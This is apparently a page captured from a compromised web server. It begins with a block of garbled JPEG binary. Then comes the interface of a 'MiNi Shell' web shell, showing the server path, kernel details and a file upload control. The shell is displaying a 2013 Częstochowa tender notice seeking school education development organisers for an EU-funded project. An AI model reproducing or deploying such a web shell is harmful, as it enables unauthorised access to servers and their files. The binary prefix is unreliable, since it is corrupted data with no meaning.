JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131107/453388-N-2013.html

<p class="kh_header"><b>Częstochowa: Świadczenie usług przez 8 Szkolnych organizatorów rozwoju edukacji (SORE) na potrzeby projektu Wspomaganie na piątkę</b><br>
<b>Numer ogłoszenia: 453388 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> bip.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przez 8 Szkolnych organizatorów rozwoju edukacji (SORE) na potrzeby projektu Wspomaganie na piątkę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa na świadczenie usług przez 8 Szkolnych organizatorów rozwoju edukacji (SORE) na potrzeby projektu Wspomaganie na piątkę


Szkolny organizator rozwoju edukacji to osoba spoza szkoły odpowiedzialna za prowadzenie procesu (tj. rocznego planu wspomagania) w szkole. Najważniejsze zadania to: wsparcie dyrektora i nauczycieli w pogłębianiu diagnozy potrzeb i określaniu priorytetowego obszaru rozwoju szkół, przygotowanie wybranej oferty doskonalenia, wspieranie nauczycieli we wdrażaniu nowych rozwiązań do codziennej praktyki, utrzymywanie stałego kontaktu dyrektorem i nauczycielami (spotkania, konsultacje)

Oferta doskonalenia jest to opis rocznego procesu wspomagania rozwoju szkoły. Oferta doskonalenia jest podstawą do zbudowania w konkretnej szkole szczegółowego rocznego planu wspomagania (wybranego aspektu pracy szkoły) opartego na wewnętrznej diagnozie potrzeb.
	
	Roczne plany wspomagania (RPW) zostaną wdrożone w roku szkolnym 2013/2014 i 2014/2015 - po 1 w 56 szkołach/przedszkolach(SZ/P). Każda SZ/P będzie wdrażała po 1 RPW w danym roku szkolnym. Do opracowania RPW zostanie wyłonionych 8 SORE (średnio po 7 SZ/P na 1 SORE zgodnie z ustalonymi wcześniej kryteriami wyboru). Spotkania odbywać się będą w salach udostępnionych przez SZ/P.

	Szkolny organizator rozwoju edukacji (SORE) obejmie opieką zespół kilku/kilkunastu szkół/przedszkoli, z którymi będzie utrzymywać stały kontakt przez rok szkolny. Działalność SORE obejmie m.in. diagnozę, opracowanie rocznych planów wspomagania, konsultacje grupowe i indywidualne, ankiety, sprawozdania, rekomendacje, co pozostanie w zgodzę z poniżej przedstawionym planem. 

a) etap I 
diagnoza potrzeb 
W trakcie diagnozy SORE we współpracy z dyrektorem i nauczycielami oraz z wykorzystaniem informacji zawartych w dokumentacji SZ/P (w szczególności: wyniki ewaluacji wewnętrznej, raport z ewaluacji zewnętrznej oraz wyniki egzaminów zewnętrznych), szczegółowo analizuje potrzeby danej placówki. Rezultatem przeprowadzenia diagnozy jest wybór tematów ofert, które będą realizowane w szkole czy przedszkolu, a także określenie zasad i etapów dot. realizacji RPW. (42 SZ i 14P x 8h = 448h)
3. Opracowanie 2RPW z 2 ofertami doskonalenia z załącznikami do dokumentacji konkursowej dla 42SZ i 14P x 2RPW x 10h = 1120h
Roczny plan wspomagania zawiera w szczególności:
3. datę rozpoczęcia i zakończenia realizacji RPW,
4. krótki opis diagnozy potrzeb,
5. cel realizacji RPW,
6. wskaźniki realizacji,
7. role osób realizujących RPW i korzystających ze wsparcia wraz z ich zaangażowaniem czasowym,
8. zadania osób realizujących RPW oraz osób korzystających ze wsparcia,
9. harmonogram realizacji RPW wraz ze wskazaniem rodzajów działań 
(np. warsztatów, konsultacji, szkoleń)
b) etap II 
doskonalenie pracy nauczycieli
Przeprowadzenie doskonalenia nauczycieli nastąpi zgodnie z RPW. Za organizację zadania odpowiedzialny jest SORE, który może, w miarę zaistniałych potrzeb, pozyskać ekspertów zewnętrznych będących specjalistami w zakresie tematyki RPW.
2. Warsztaty z ekspertami dla nauczycieli - 56 SZ/P x 2RPW x 10 warsztatów x 3h = 3360h
3. Wykłady i konsultacje grupowe z ekspertami dla nauczycieli - 56 SZ/P x 2RPW x 6wykładów/konsultacji x 3h = 2016h
c) etap III
b) Pomoc w przełożeniu nowych umiejętności nauczycieli na szkolną praktykę
SORE zobligowani zostają do udzielenia pomocy w przełożeniu nowych umiejętności nauczycieli na szkolną praktykę, który winien spełniać jednocześnie rolę konsultanta - moderatora spotkań z nauczycielami. W związku z powyższym SORE w harmonogramie powinien zaplanować cykliczne konsultacje indywidualne / grupowe (6-8 spotkań, trwających średnio po 2 godziny każde). Konsultacje prowadzi SORE, jak również wspiera dyrektora w nowo podjętych działaniach.
1. Przełożenie nowych umiejętności na praktykę - konsultacje indywidualne z SORE dla nauczycieli i dyrektorów - 56 SZ/P x 2RPW x 10h = 1120h; konsultacje grupowe dla nauczycieli i dyrektorów - 56 SZ/P x 2RPW x 5h = 560h
d) Przygotowanie sprawozdania z RPW
Po zakończeniu realizacji RPW SORE przeprowadzi podsumowanie wdrożenia, a sporządzone sprawozdanie przedstawi dyrektorowi i radzie pedagogicznej.
1. 2 ankiety z przebiegu wspomagania w ramach 2RPW - 56 SZ/P x 2 ankiety x 2h = 224h
2. 2 sprawozdania z 2RPW = 56 SZ/P x 2 sprawozdania x 4h = 448h
3. przygotowanie rekomendacji do pracy w następnym roku - 56 SZ/P x 2 rekomendacje x 3h = 336h

Za monitoring powyższych działań odpowiedzialny będzie Specjalista ds. sprawozdawczości, monitoringu i ewaluacji we współpracy ze Specjalistą ds. powiatowego planu wspomagania.

Termin realizacji: od dnia podpisania umowy do 30 czerwca 2015 roku.
Łączna liczba godzin pracy Szkolnych organizatorów rozwoju edukacji - 532 h, średnio na miesiąc: 26,6 h 
Jeden RPW realizowany jest w trakcie jednego roku szkolnego, przy czym ze względu na efektywność i skuteczność podejmowanych działań, proces ten nie może być krótszy niż 7 miesięcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykształcenie:
- wyższe magisterskie
- uprawnienia pedagogiczne
- szkolenie przygotowujące do pracy SORE
- ukończone formy doskonalenia przygotowujące do pracy z dorosłymi 
(kurs/studia podyplomowe z andragogiki lub zarządzania w oświacie, lub kwalifikacje edukatorskie).
2. Doświadczenie w pracy z grupą osób dorosłych:
- doświadczenie w kierowaniu spotkaniami-warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów, m.in. warsztaty strategiczne, tworzenie procedur
- doświadczenie zawodowe w pracy z radami pedagogicznymi oraz w prowadzeniu różnorodnych form szkoleniowych (konsultacje indywidualne i zespołowe, szkolenia, konferencje przedmiotowo-metodyczne, warsztaty)
3. Doświadczenie w edukacji:
a) realizacja usług rozwojowych na rzecz systemu edukacji publicznej i-lub niepublicznej,
- doświadczenie w pracy na poszczególnych etapach edukacyjnych - min.5 lat. Wykonawca musi wykazać dysponowanie osobami z wszystkich etapów edukacyjnych przewidzianych w projekcie  (min. 1 osoba z doświadczeniem min. 5 lat na danym etapie edukacyjnym).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony druk OFERTA stanowiący załącznik nr 1 do niniejszej specyfikacji, zawierający oświadczenie, że wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
	Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych.
Istnieje możliwość dokonania zmiany osób przewidzianych do wykonania zamówienia, przedstawionych w ofercie przetargowej Zleceniobiorcy, za uprzednią pisemną zgodą Zleceniodawcy, w następujących okolicznościach: śmierci, choroby lub innych zdarzeń losowych, które muszą być udokumentowane.
W przypadku zmiany osoby, o której mowa w ust. 2 niniejszego paragrafu, nowa osoba musi spełniać co najmniej wymagania określone w specyfikacji istotnych warunków zamówienia dla tej osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Edukacji Urzędu Miasta Częstochowy, ul. Śląska 11/13, Magdalena Nocoń, pok. 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2013 godzina 08:30, miejsce: Biuro Obsługi Interesanta, stanowisko Wydziału Nadz. i Admin. (parter),ul. Śląska 11/13, 42-217   Cz-wa. Otwarcie: 15.11.13, godz. 09:00,w siedzibie zamawiającego w sali 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com